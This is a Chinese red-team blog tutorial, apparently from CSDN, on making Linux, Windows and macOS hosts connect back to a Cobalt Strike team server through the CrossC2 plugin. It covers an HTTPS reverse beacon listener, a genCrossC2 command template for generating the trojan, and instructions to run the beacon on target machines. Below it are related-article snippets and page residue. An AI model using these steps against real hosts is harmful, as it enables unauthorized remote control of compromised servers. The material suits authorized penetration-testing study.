【攻防实战】Linux终端上线Cobalt Strike

最新推荐文章于 2025-07-12 12:22:09 发布
最新推荐文章于 2025-07-12 12:22:09 发布
阅读量526 收藏 7
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 1.红蓝攻防 # 1. 攻防实战 文章标签: linux 运维 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48899364/article/details/148154531

如果巅峰留不住,那就重走来时路

前言

目前在一些攻防项目中打点获取到的服务器,很多都是Linux主机。研究过程中发现网上这方面分享比较少,这里记录分享一下。本篇文章将完成三大主流操作系统,windows、linux、macos上线Cobalt Strike。

成果展示

macos系统是一个被咬一口的苹果


linux系统是一只企鹅


windows系统是一个窗户

插件安装

配置cna基础文件,注意路径名不能包含中文或特殊字符,这里我自己的CrossC2和bin的配置是这样,一定要确保这个路径和文件名是对应的,并且文件有可执行的权限。

加载CrossC2的cna插件,加载成功会看到插件

生成上线马

创建一个https的监听器,端口任意。这里需要注意,CrossC2上线实际也是通过创建的监听器上线,并且由于一些限制,只能是https的监听器

服务端开启监听 https 类型的beacon

windows/beacon_https/reverse_https

使用CrossC2插件生成一个木马。端口可任意设置,填.cobaltstrike.beacon_keys文件的绝对路径,选择系统为MacOS木马,监听器选择刚才创建的https监听器,最后是生成可执行文件的目录和文件名。

这里注意还有一个地方需要注意,就是把自己服务端cs目录下的.cobaltstrike.beacon_keys文件放到和genCrossC2同级目录下,不然会遇到key错误的提示。

图形化

生成木马Beacon

命令行

命令如下

./genCrossC2.Linux [TeamServer的IP] [HTTPS监听器端口] [.cobaltstrike.beacon_keys文件路径] [自定义的动态链接库文件] [运行Beacon的平台] [运行Beacon的平台位数] [输出的结果文件]

linux平台


windows平台

此时可以通过执行tmp目录下生成的可执行文件上线,或者利用插件生成命令执行上线,将生成的Beacon放到目标机器上去执行即可

将生成的Beacon放到目标机器上去执行即可

成功上线

查看cs成功上线,Linux是这个企鹅

并且可以直接执行命令

总结

至此已完成三大主流操作系统,windows、linux、macos上线Cobalt Strike。

macos

是一个被咬一口的苹果

linux

是一只企鹅

windows

是一个窗户

攻防交流群

声明

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1375
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
内网安全:隧道技术详解
zz12345600354的博客
04-29 1287
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
Cobalt Strike 4.2安装配置笔记(Client:M1芯片MacBook )(Server:CentOS7 )
Bluffing的博客
04-18 2714
目录1 Mac端(Client)1.1 安装JDK1.2 运行cs1.3 使用Mac的自动操作创建应用程序2 CentOS7端(Server)2.1 安装JDK2.1.1 搜索jdk包2.1.2 安装jdk1.8 默认的目录为: /usr/lib/jvm/2.1.3 配置环境变量及验证安装2.1.4 测试2.2 配置cs3 连接 1 Mac端(Client) 1.1 安装JDK 下载jdk: https://www.oracle.com/technetwork/java/javase/downloads/j
攻防实战】MacOS系统上线Cobalt Strike
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-21 523
如果巅峰留不住,那就重走来时路
Cobalt Strike
ALe0721的博客
07-06 415
Cobalt Strike是一款渗透测试神器,业界人称CS神器。早期版本的Cobalt Strike依赖Metasploit框架,如今已经不再使用MSF而是作为单独的平台使用。Cobalt Strike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。这个工具的社区版是Armitage(一个MSF的图形化界面工具),而Cobalt Strike大家可以理解其为Armitage的商业版。
Mac安装Cobalt Strike 4 【亲测有用】
鹿鸣天涯
09-13 5010
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。早期以Metasploit为基础的GUI框架式渗透测试工具,而现在Cobalt Strike已经不再使用MSF而是作为一个单独的平台使用,它集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑等。 钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。 Cobalt Strike 作为一款协同APT
Mac制作cobaltstrike程序启动
y995zq的博客
03-18 1980
在看了很多博客之后,终于启动了符合我情况的命令,原因是没有.auth文件,但是这个包里有bat的文件,里面是有对应的认证码的。 看一下很多博客启动命令的对比,最后才实验成功。 CS文件介绍 agscript:扩展应⽤的脚本 c2lint:⽤于检查profile的错误和异常 teamserver:服务器端启动程序 cobaltstrike.jar:CobaltStrike核⼼程序 cobaltstrike.auth:⽤于客户端和服务器端认证的⽂件,客户端和服务端有⼀个⼀模⼀样的 c
mac制作Cobalt Strike
weixin_43376075的博客
08-04 744
1. 制作APP 打开mac自带的工具——自动操作APP。 打开自动操作APP后,选择文稿类型为「应用程序」,点击「选取」。 左侧列表中找到运行Shell脚本拖至右侧,然后输入命令(cd进入自己电脑下Cobalt Strike所在位置) cd /Users/lmc/tools/cobaltstrike3 && java -Xdock:icon=cobaltstrike.icns -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UsePara
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6255
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
红队眼中主要的安全防御能力怎样突破
maoguan121的博客
10-13 5663
蓝队作为实战攻防演练中的攻击方,根据队员的不同攻击能力特 点组织攻击团队。队员们在网络攻击各阶段各司其职,采用适当的攻 击手段和攻击策略对目标系统展开网络攻击,最终获取目标网络和系 统的控制权限和数据,检验目标单位的网络安全防护能力。本部分主要站在蓝队的角度,讲述网络实战攻防演练中攻击阶段 的划分、各阶段主要工作内容、攻击中主要使用的技术手段以及攻方 人员必备的技能,最后通过多个实战案例对攻击手段进行了直观展 示。
红队专题-与维持隐匿Privilege Escalation
aming小老弟
10-27 1684
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
MAC可视化-Cobalt Strike 4.4
02-14
测试使用,切勿非法使用,后果自行负责。
cobaltstrike进阶篇之linux上线linux
weixin_69925635的博客
06-05 884
cs的部署和基本上线过程可以参考我前面一篇文章,接下来尝试利用linux(服务端和客户端都放在同一台kali上)上线linux(ubuntu)将CrossC2-GithubBot-2023-03-27.cna其中path改成genCrossC2.linux的path。选择CSversion为4.4,日志中出现success,在指定目录下出现t_cc2.out,传到靶机并双击运行,成功上线。这个时候cs顶部会多出来一个选项,选择创建一个c2监听器,在之前需要先创建一个https的监听器。
Cobalt strike上线
A_dmin的博客
09-25 1441
Cobalt strike上线 这里记录一下cs如何上线主机的,以及一些简单的利用方法,,, 之前去参加过一次攻防演练,发现打不到内网就没什么分数, 所以最近想学习一些内网的知识,就从cs上线开始吧,,在现场听的最多的就是cs上线,,,, 首先准备一个服务端,,,这里我使用的是阿里云的服务器,,, 安装java环境: 查看安装列表:yum -y list java* 安装java环境-1.8的:yum instal java-1.8.0-openjdk-demo.x86_64 检查安装是否完成: 然后
CobaltStrike上线Linux
qq_35664104的博客
11-11 1423
在红蓝对抗中,我们常需要对目标进行长时间的控制,cobaltstrike原生对于上线windows比较轻松友好,但如果是Linux平台就需要用到第三方插件了。 准备工作 这里使用CrossC2的插件,类似于在linux上反弹一个cobaltstrike类的shell。 github:https://github.com/gloxec/CrossC2 下载时注意自己的cs版本(我这里使用的是3.0.2的最新版插件,cs版本为4.3) 需要下载以下两个文件: CrossC2***.cna、genCrossC2
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
qq_53058639的博客
01-27 3194
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
CobaltStrike上线linux
weixin_45715461的博客
07-27 416
CobaltStrike上线linux
cobaltstrike安装_Mac版CobaltStrike分享
weixin_39853968的博客
11-30 1017
需要的原材料一台MacInstall4j自己处理好的cobaltstrike安装以后按照步骤一步一步执行即可,主要是运行器的自定义那里这里是我的demo最后build就行,burp也是用这个软件转的。cobaltstrike更改的点如下:去除只有一个监听器的限制自定义的404页面去除Beacon的暗桩去除空格后门其他的就是常规的了下载地址:后台回留言cs14即可  未遇你之前,我...
Cobalt Strike4.8通过CrossC2插件上线Linux
最新发布
m0_73709731的博客
07-12 597
摘要:本文介绍了在Kali 2025.2虚拟机上配置CobaltStrike 4.8汉化版与CrossC2插件的完整流程。包括工具下载、文件配置(需将beacon_keys文件复制到插件目录)、修改cna脚本路径参数、启动服务端和客户端。重点说明了如何通过Python HTTP服务器传输文件、添加HTTPS监听器、生成Linux x64木马(需赋予执行权限)以及最终执行木马上线的过程。配置过程中需注意端口选择、文件路径设置和版本匹配(必须使用4.4-souceVersion)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值